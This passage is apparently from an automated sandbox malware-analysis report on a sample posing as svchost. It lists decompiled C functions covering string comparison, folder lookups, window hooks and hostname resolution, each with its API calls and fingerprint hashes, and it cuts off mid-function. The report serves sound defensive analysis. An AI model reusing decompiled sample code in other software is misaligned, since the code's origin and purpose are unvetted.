    • GlobalHandle.KERNEL32(00E05B70), ref: 0048C97F
    • GlobalFix.KERNEL32(00000000), ref: 0048C986
    • RtlLeaveCriticalSection.NTDLL(?), ref: 0048C98C
    • GlobalFix.KERNEL32(00000000), ref: 0048C99B
    • RtlLeaveCriticalSection.NTDLL(?), ref: 0048C9E4
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Global$CriticalSection$AllocHandleLeave$EnterWire
    • String ID:
    • API String ID: 1877740037-0
    • Opcode ID: 6039de8a58c1313a6c764ab009bf0b701e6b4b571c609cc53bc69ed515cc8348
    • Instruction ID: 0fb558574cd719cfd31b8d3586acc4b5cc1f1e506a4120d12e69fc947eb9df05
    • Opcode Fuzzy Hash: 6039de8a58c1313a6c764ab009bf0b701e6b4b571c609cc53bc69ed515cc8348
    • Instruction Fuzzy Hash: A23172B5200705AFD724AF28DD89A2AB7E9FB44305B004D7FF996C3661E775E9048B24
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

(Rendered graph omitted; in the report its nodes are shaded Executed / Not Executed.) Basic blocks of E0047D13F that call out, as recorded in the graph:
• 47d13f-47d170 (entry)
• 47d172-47d185: CompareStringW
• 47d18f-47d1a2: CompareStringA
• 47d1b9-47d1c6 and 47d1ce-47d1db: call 4785f8
• 47d1e8-47d1fe: CompareStringA
• 47d242-47d251: GetCPInfo
• 47d2bd-47d2d3: MultiByteToWideChar
• 47d2d9-47d30f: call 471390
• 47d315-47d32d: MultiByteToWideChar
• 47d32f-47d345: MultiByteToWideChar
• 47d347-47d379: call 471390
• 47d37b-47d390: MultiByteToWideChar
• 47d392-47d3a6: CompareStringW
• 47d3a8 and 47d3aa-47d3bb (exit)
    C-Code - Quality: 86%
    			E0047D13F(int _a4, int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28) {
    				signed int _v8;
    				intOrPtr _v20;
    				short* _v28;
    				int _v32;
    				int _v36;
    				short* _v40;
    				short* _v44;
    				char _v58;
    				struct _cpinfo _v64;
    				void* _v80;
    				int _t65;
    				int _t66;
    				int _t69;
    				intOrPtr* _t82;
    				intOrPtr* _t84;
    				int _t86;
    				int _t87;
    				int _t88;
    				int _t90;
    				void* _t96;
    				char _t99;
    				char _t101;
    				intOrPtr _t104;
    				intOrPtr _t105;
    				int _t107;
    				short* _t109;
    				int _t111;
    				int _t114;
    				intOrPtr _t115;
    				short* _t116;
    				int _t118;
    
    				_push(0xffffffff);
    				_push(0x49e2f0);
    				_push(E00472CF4);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t115;
    				_t116 = _t115 - 0x30;
    				_v28 = _t116;
    				_t118 =  *0x4e1ad0; // 0x1
    				_t107 = 1;
    				if(_t118 != 0) {
    					L5:
    					_t111 = _a16;
    					if(_t111 > 0) {
    						_t88 = E004785F8(_a12, _t111);
    						_pop(_t96);
    						_t111 = _t88;
    						_a16 = _t111;
    					}
    					if(_a24 > 0) {
    						_t87 = E004785F8(_a20, _a24);
    						_pop(_t96);
    						_a24 = _t87;
    					}
    					_t65 =  *0x4e1ad0; // 0x1
    					if(_t65 != 2) {
    						if(_t65 != _t107) {
    							goto L48;
    						} else {
    							if(_a28 == 0) {
    								_t86 =  *0x4e19e4; // 0x0
    								_a28 = _t86;
    							}
    							if(_t111 == 0 || _a24 == 0) {
    								if(_t111 != _a24) {
    									if(_a24 <= _t107) {
    										if(_t111 > _t107) {
    											L30:
    											_push(3);
    											goto L18;
    										} else {
    											if(GetCPInfo(_a28,  &_v64) == 0) {
    												goto L48;
    											} else {
    												if(_t111 <= 0) {
    													if(_a24 <= 0) {
    														goto L39;
    													} else {
    														if(_v64 >= 2) {
    															_t82 =  &_v58;
    															if(_v58 != 0) {
    																while(1) {
    																	_t104 =  *((intOrPtr*)(_t82 + 1));
    																	if(_t104 == 0) {
    																		goto L20;
    																	}
    																	_t99 =  *_a20;
    																	if(_t99 <  *_t82 || _t99 > _t104) {
    																		_t82 = _t82 + 2;
    																		if( *_t82 != 0) {
    																			continue;
    																		} else {
    																			goto L20;
    																		}
    																	} else {
    																		goto L17;
    																	}
    																	goto L49;
    																}
    															}
    														}
    														goto L20;
    													}
    												} else {
    													if(_v64 >= 2) {
    														_t84 =  &_v58;
    														if(_v58 != 0) {
    															while(1) {
    																_t105 =  *((intOrPtr*)(_t84 + 1));
    																if(_t105 == 0) {
    																	goto L30;
    																}
    																_t101 =  *_a12;
    																if(_t101 <  *_t84 || _t101 > _t105) {
    																	_t84 = _t84 + 2;
    																	if( *_t84 != 0) {
    																		continue;
    																	} else {
    																		goto L30;
    																	}
    																} else {
    																	goto L17;
    																}
    																goto L50;
    															}
    														}
    													}
    													goto L30;
    													L50:
    												}
    											}
    										}
    									} else {
    										L20:
    										_t66 = _t107;
    									}
    								} else {
    									L17:
    									_push(2);
    									L18:
    									_pop(_t66);
    								}
    							} else {
    								L39:
    								_t69 = MultiByteToWideChar(_a28, 9, _a12, _t111, 0, 0);
    								_v32 = _t69;
    								if(_t69 == 0) {
    									goto L48;
    								} else {
    									_v8 = 0;
    									E00471390(_t69 + _t69 + 0x00000003 & 0x000000fc, _t96);
    									_v28 = _t116;
    									_v40 = _t116;
    									_v8 = _v8 | 0xffffffff;
    									if(_v40 == 0 || MultiByteToWideChar(_a28, _t107, _a12, _t111, _v40, _v32) == 0) {
    										goto L48;
    									} else {
    										_t114 = MultiByteToWideChar(_a28, 9, _a20, _a24, 0, 0);
    										_v36 = _t114;
    										if(_t114 == 0) {
    											goto L48;
    										} else {
    											_v8 = _t107;
    											E00471390(_t114 + _t114 + 0x00000003 & 0x000000fc, _t96);
    											_v28 = _t116;
    											_t109 = _t116;
    											_v44 = _t109;
    											_v8 = _v8 | 0xffffffff;
    											if(_t109 == 0 || MultiByteToWideChar(_a28, 1, _a20, _a24, _t109, _t114) == 0) {
    												goto L48;
    											} else {
    												_t66 = CompareStringW(_a4, _a8, _v40, _v32, _t109, _t114);
    											}
    										}
    									}
    								}
    							}
    						}
    					} else {
    						_t66 = CompareStringA(_a4, _a8, _a12, _t111, _a20, _a24);
    					}
    				} else {
    					_t90 = CompareStringW(0, 0, 0x49de2c, _t107, 0x49de2c, _t107); // executed
    					if(_t90 == 0) {
    						if(CompareStringA(0, 0, 0x49de28, _t107, 0x49de28, _t107) == 0) {
    							L48:
    							_t66 = 0;
    						} else {
    							 *0x4e1ad0 = 2;
    							goto L5;
    						}
    					} else {
    						 *0x4e1ad0 = _t107;
    						goto L5;
    					}
    				}
    				L49:
    				 *[fs:0x0] = _v20;
    				return _t66;
    				goto L50;
    			}


    APIs
    • CompareStringW.KERNELBASE(00000000,00000000,0049DE2C,00000001,0049DE2C,00000001,00000000,04D01BE4,0000000C,00000000,0000000C,00000000,000001D0,00000000,00000000,00470473), ref: 0047D17D
    • CompareStringA.KERNEL32(00000000,00000000,0049DE28,00000001,0049DE28,00000001), ref: 0047D19A
    • CompareStringA.KERNEL32(004564F6,00000000,00000000,00000000,00470473,00000000,00000000,04D01BE4,0000000C,00000000,0000000C,00000000,000001D0,00000000,00000000,00470473), ref: 0047D1F8
    • GetCPInfo.KERNEL32(00000000,00000000,00000000,04D01BE4,0000000C,00000000,0000000C,00000000,000001D0,00000000,00000000,00470473,00000000), ref: 0047D249
    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000), ref: 0047D2C8
    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 0047D329
    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,?,00000000,00000000), ref: 0047D33C
    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0047D388
    • CompareStringW.KERNEL32(004564F6,00000000,00000000,00000000,?,00000000,?,00000000), ref: 0047D3A0
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ByteCharCompareMultiStringWide$Info
    • String ID:
    • API String ID: 1651298574-0
    • Opcode ID: 5cd38332acad25a66700c0e1fdee4d06cde6f03966b1295a37150fc273a75521
    • Instruction ID: ec8d8a2cf967f987526567af7a716a9f018f116a45b960af5b78a0967a218efd
    • Opcode Fuzzy Hash: 5cd38332acad25a66700c0e1fdee4d06cde6f03966b1295a37150fc273a75521
    • Instruction Fuzzy Hash: 4271BD32D10249AFCF219F54CD819EF7BBAEF45310F14816BF959A6221C3398852DB99
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 486 46eb40-46eb65 487 46eb67-46eb6a 486->487 488 46ebdb-46ebde 486->488 487->488 489 46eb6c-46eb6f 487->489 490 46ebf2-46ebf5 488->490 491 46ebe0-46ebf0 GetWindowsDirectoryA 488->491 492 46eb71-46eb76 489->492 493 46eb78-46eb7b 489->493 495 46ebf7-46ec07 GetSystemDirectoryA 490->495 496 46ec09-46ec0c 490->496 494 46ec1e-46ec28 491->494 497 46ebc1-46ebd3 SHGetSpecialFolderPathA 492->497 498 46eb84-46eb87 493->498 499 46eb7d-46eb82 493->499 500 46ec5e-46ec65 494->500 502 46ec2a-46ec3c 494->502 495->494 496->500 501 46ec0e-46ec18 GetTempPathA 496->501 497->500 503 46ebd9 497->503 504 46eb90-46eb93 498->504 505 46eb89-46eb8e 498->505 499->497 501->494 506 46ec3e-46ec43 502->506 507 46ec4f-46ec5c call 46eaf0 502->507 503->502 509 46eb95-46eb9a 504->509 510 46eb9c-46eb9f 504->510 505->497 506->507 511 46ec45-46ec4a 506->511 507->500 509->497 513 46eba1-46eba6 510->513 514 46eba8-46ebab 510->514 511->507 513->497 515 46ebb4-46ebbe 514->515 516 46ebad-46ebb2 514->516 515->497 516->497
    C-Code - Quality: 65%
    			E0046EB40(void* __edi, intOrPtr* _a4, signed int* _a12) {
    				char _v260;
    				signed int _t17;
    				int _t18;
    				intOrPtr _t20;
    				void* _t24;
    				signed int _t25;
    				void* _t28;
    				void* _t33;
    				intOrPtr* _t36;
    				char* _t37;
    
    				_t33 = __edi;
    				_t37 =  &_v260;
    				_t36 = _a4;
    				_v260 = 0;
    				 *_t36 = 0;
    				_t17 =  *_a12;
    				if(_t17 < 1 || _t17 > 8) {
    					if(_t17 != 9) {
    						if(_t17 != 0xa) {
    							if(_t17 != 0xb) {
    								goto L28;
    							}
    							_t18 = GetTempPathA(0x104,  &_v260);
    							L23:
    							_t25 = 0;
    							asm("sbb eax, eax");
    							_t17 =  ~_t18;
    							if(_t17 == 0) {
    								goto L28;
    							}
    							goto L24;
    						}
    						_t18 = GetSystemDirectoryA( &_v260, 0x104);
    						goto L23;
    					}
    					_t18 = GetWindowsDirectoryA( &_v260, 0x104);
    					goto L23;
    				} else {
    					if(_t17 != 1) {
    						if(_t17 != 2) {
    							if(_t17 != 3) {
    								if(_t17 != 4) {
    									if(_t17 != 5) {
    										if(_t17 != 6) {
    											asm("sbb eax, eax");
    											_t24 = ( ~(_t17 - 7) & 0x00000013) + 7;
    										} else {
    											_t24 = 2;
    										}
    									} else {
    										_t24 = 0xb;
    									}
    								} else {
    									_t24 = 0x14;
    								}
    							} else {
    								_t24 = 0x10;
    							}
    						} else {
    							_t24 = 6;
    						}
    					} else {
    						_t24 = 5;
    					}
    					_t25 =  &_v260;
    					_t17 =  *0x4923c8(0, _t25, _t24, 0); // executed
    					if(_t17 == 0) {
    						L28:
    						return _t17;
    					}
    					L24:
    					_push(_t33);
    					asm("repne scasb");
    					_t28 =  !(_t25 | 0xffffffff) - 1;
    					if(_t28 > 0 && _t37[_t28 + 3] != 0x5c) {
    						_t37[_t28 + 4] = 0x5c;
    						_t37[_t28 + 5] = 0;
    					}
    					_t20 = E0046EAF0(_t28,  &_v260);
    					 *_t36 = _t20;
    					return _t20;
    				}
    			}

    APIs
    • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,?,00000000), ref: 0046EBCB
    • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 0046EBEA
    • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 0046EC01
    • GetTempPathA.KERNEL32(00000104,00000000), ref: 0046EC18
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: DirectoryPath$FolderSpecialSystemTempWindows
    • String ID: \$\
    • API String ID: 2721284240-164819647
    • Opcode ID: 80a58efe848c513585cf2befe566984d6504763871e6425707f96f1a23fbb78b
    • Instruction ID: 232d4b461996c255ed3f04de68dca5527e98b65d9d739a8ccd85a638c7d2a7e5
    • Opcode Fuzzy Hash: 80a58efe848c513585cf2befe566984d6504763871e6425707f96f1a23fbb78b
    • Instruction Fuzzy Hash: 2331D9B95082419AEB24C626C985B7B76E0D791F10F144D2FE183C62C0F6BDD885979B
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 84%
    			E004891F9(void* __ecx) {
    				intOrPtr _t6;
    				struct HDC__* _t17;
    				void* _t18;
    
    				_t18 = __ecx;
    				_t6 =  *((intOrPtr*)( *0x492520))(0xb); // executed
    				 *((intOrPtr*)(__ecx + 8)) = _t6;
    				 *((intOrPtr*)(_t18 + 0xc)) = GetSystemMetrics(0xc);
    				if( *((intOrPtr*)(_t18 + 0x68)) == 0) {
    					E0048D79C();
    				} else {
    					E0048D76C();
    				}
    				_t17 = GetDC(0);
    				 *((intOrPtr*)(_t18 + 0x18)) = GetDeviceCaps(_t17, 0x58);
    				 *((intOrPtr*)(_t18 + 0x1c)) = GetDeviceCaps(_t17, 0x5a);
    				return ReleaseDC(0, _t17);
    			}

    APIs
    • KiUserCallbackDispatcher.NTDLL(0000000B), ref: 00489206
    • GetSystemMetrics.USER32(0000000C), ref: 0048920D
    • GetDC.USER32(00000000), ref: 00489226
    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00489237
    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0048923F
    • ReleaseDC.USER32(00000000,00000000), ref: 00489247
      • Part of subcall function 0048D76C: GetSystemMetrics.USER32(00000002), ref: 0048D77E
      • Part of subcall function 0048D76C: GetSystemMetrics.USER32(00000003), ref: 0048D788
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
    • String ID:
    • API String ID: 1031845853-0
    • Opcode ID: f8352d8550c19259b34f5e3dc6f8aa0c84f192fe368e4fff8fd843baca40de77
    • Instruction ID: 8f68e6c57e9ee1f0c0c0324b0bfe65526cfc3aae9d694e8d60acf27de776cb22
    • Opcode Fuzzy Hash: f8352d8550c19259b34f5e3dc6f8aa0c84f192fe368e4fff8fd843baca40de77
    • Instruction Fuzzy Hash: F5F09030540700BFE3207B629C89B2BBBA4EB91751F00483BE205862D0DAB89C058F65
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 532 40b4c0-40b4e1 call 416160 gethostbyname 535 40b4e3-40b4f3 inet_ntoa 532->535 536 40b51c-40b52f call 4147a0 532->536 535->536 537 40b4f5-40b51b 535->537 537->536
    C-Code - Quality: 50%
    			E0040B4C0(void* __edi, void* __esi, void* __eflags, intOrPtr* _a12) {
    				intOrPtr* _v0;
    				void _v60;
    				void* _t8;
    				intOrPtr _t9;
    				void* _t11;
    				signed int _t19;
    				unsigned int _t21;
    				signed int _t22;
    				void* _t40;
    				void* _t42;
    				char* _t43;
    
    				_t43 = _t42 - 0x34;
    				 *_t43 = 0;
    				E00416160(0x4c93b0);
    				_t8 =  *0x4926a0( *_a12); // executed
    				if(_t8 != 0) {
    					_t19 =  *( *( *(_t8 + 0xc)));
    					_t11 =  *0x4926c0(_t19);
    					if(_t11 != 0) {
    						asm("repne scasb");
    						_t21 =  !(_t19 | 0xffffffff);
    						_t40 = _t11 - _t21;
    						_t22 = _t21 >> 2;
    						memcpy(_t40 + _t22 + _t22, _t40, memcpy( &_v60, _t40, _t22 << 2) & 0x00000003);
    						_t43 = _t43 + 0x18;
    					}
    				}
    				_t9 = E004147A0(_t43, _t43);
    				 *_v0 = _t9;
    				return _t9;
    			}

    APIs
      • Part of subcall function 00416160: WSAStartup.WS2_32(00000101,?), ref: 0041617D
    • gethostbyname.WS2_32 ref: 0040B4D9
    • inet_ntoa.WS2_32 ref: 0040B4EB
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Startupgethostbynameinet_ntoa
    • String ID: ^I
    • API String ID: 2837760686-3473481074
    • Opcode ID: 29438b83faf2d519c10a2b36849a3bd038b0f68c89d909461575c2a8ad937b35
    • Instruction ID: 376bb157f96a625e2d6d376d204659d3c69f2582d5c4d4c2dcd5816659abe8f1
    • Opcode Fuzzy Hash: 29438b83faf2d519c10a2b36849a3bd038b0f68c89d909461575c2a8ad937b35
    • Instruction Fuzzy Hash: 77014B392142406BC318EB39D844A5BBBE5FBC5310B44866EF91ACB3E5DB78D804CA99
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 540 487fcd-487fd6 call 48c6bf 543 487fd8-488003 call 48c48d GetCurrentThreadId SetWindowsHookExA call 48ccdc 540->543 544 48802b 540->544 548 488008-48800e 543->548 549 48801b-48802a call 48cc47 548->549 550 488010-488015 call 48c6bf 548->550 549->544 550->549
    C-Code - Quality: 88%
    			E00487FCD() {
    				void* _t6;
    				void* _t7;
    				struct HHOOK__* _t9;
    				void* _t18;
    
    				_t6 = E0048C6BF();
    				if( *((char*)(_t6 + 0x14)) == 0) {
    					_t7 = E0048C48D();
    					_t9 = SetWindowsHookExA(0xffffffff, E00488325, 0, GetCurrentThreadId()); // executed
    					_push(E0048C341);
    					 *(_t7 + 0x30) = _t9;
    					_t18 = E0048CCDC(0x4e14d0);
    					if( *((intOrPtr*)(_t18 + 0x14)) != 0) {
    						 *((intOrPtr*)(_t18 + 0x14))( *((intOrPtr*)(E0048C6BF() + 8)));
    					}
    					return E0048CC47(0x4e14cc, E0048D2FF);
    				}
    				return _t6;
    			}

    APIs
    • GetCurrentThreadId.KERNEL32 ref: 00487FE0
    • SetWindowsHookExA.USER32(000000FF,00488325,00000000,00000000), ref: 00487FF0
      • Part of subcall function 0048CCDC: __EH_prolog.LIBCMT ref: 0048CCE1
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CurrentH_prologHookThreadWindows
    • String ID: `4
    • API String ID: 2183259885-1416234365
    • Opcode ID: 4173d67ac9d73588770c3c7945d59743cda74723ed26d28d6b5ebad327f5ea93
    • Instruction ID: 7f8a7866a4de8df85c9c429b1798fb5d712ebf34a798087481759412b71a3ca8
    • Opcode Fuzzy Hash: 4173d67ac9d73588770c3c7945d59743cda74723ed26d28d6b5ebad327f5ea93
    • Instruction Fuzzy Hash: 6DF0A0314402506BCB253BB1A95DB1E3690AB00725F054EBFB511571E1CFBC8844876E
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 555 485152-48516c call 48cc47 558 485199-48519b 555->558 559 48516e-485172 555->559 560 485174-48518f GetCurrentThreadId SetWindowsHookExA 559->560 561 485196 559->561 560->561 562 485191 call 481443 560->562 561->558 562->561
    C-Code - Quality: 47%
    			E00485152() {
    				char _v0;
    				struct HHOOK__* _t6;
    				intOrPtr _t9;
    				struct HHOOK__* _t10;
    
    				_t6 = E0048CC47(0x4e140c, E0048BFC8);
    				_t10 = _t6;
    				_t1 =  &_v0; // 0x48525a
    				_t9 =  *_t1;
    				if( *((intOrPtr*)(_t10 + 0x14)) == _t9) {
    					return _t6;
    				}
    				if( *(_t10 + 0x2c) == 0) {
    					_t6 = SetWindowsHookExA(5, E00484F5C, 0, GetCurrentThreadId()); // executed
    					 *(_t10 + 0x2c) = _t6;
    					if(_t6 == 0) {
    						_t6 = E00481443(0x4e140c);
    					}
    				}
    				 *((intOrPtr*)(_t10 + 0x14)) = _t9;
    				return _t6;
    			}

    APIs
      • Part of subcall function 0048CC47: TlsGetValue.KERNEL32(004E141C,00000000,?,00483883,0048BFC8,?,?,00483860,?,0040AB42,000007DD,?,00000000), ref: 0048CC86
    • GetCurrentThreadId.KERNEL32 ref: 00485174
    • SetWindowsHookExA.USER32(00000005,00484F5C,00000000,00000000), ref: 00485184
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CurrentHookThreadValueWindows
    • String ID: ZRH
    • API String ID: 933525246-1860207616
    • Opcode ID: 9dd283d496804b800f3569e32bbc146fc980cc5754bb5bc5d551af73cc464a15
    • Instruction ID: 4655b34550ac9e0bed039503420e30a5a68be570f4b08cf102ebae3f5b1eb490
    • Opcode Fuzzy Hash: 9dd283d496804b800f3569e32bbc146fc980cc5754bb5bc5d551af73cc464a15
    • Instruction Fuzzy Hash: B4E03031600700AEC2347B665809B1F76A4DB90B26F514D2FF20581685C3789845CB7E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040B480(void* __eflags) {
    				intOrPtr* _v4;
    				int _t4;
    				intOrPtr _t5;
    				void* _t9;
    				char* _t10;
    
    				_t10 = _t9 - 0x10;
    				 *_t10 = 0;
    				E00416160(0x4c93b0);
    				_t4 = gethostname(_t10, 0x10); // executed
    				if(_t4 == 0xffffffff) {
    					 *_t10 = 0;
    				}
